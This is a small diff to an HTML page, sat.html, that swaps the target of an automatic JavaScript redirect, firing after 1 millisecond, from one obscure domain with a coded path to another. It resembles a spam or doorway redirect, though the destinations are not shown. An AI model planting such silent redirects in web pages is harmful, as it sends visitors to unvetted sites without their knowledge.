--- a/sat.html
+++ b/sat.html
@@ -8,7 +8,7 @@
 
 		
          setTimeout(function(){
-            window.location.href = 'http://bmvstamp.com/2029914YY5258596Jc0Cw0cV39DMr131410Tk';
+            window.location.href = 'http://xhuauto.com/2030760CM5260627Db0nt0eR38Qgr131838At';
          }, 1);
 
 </script>
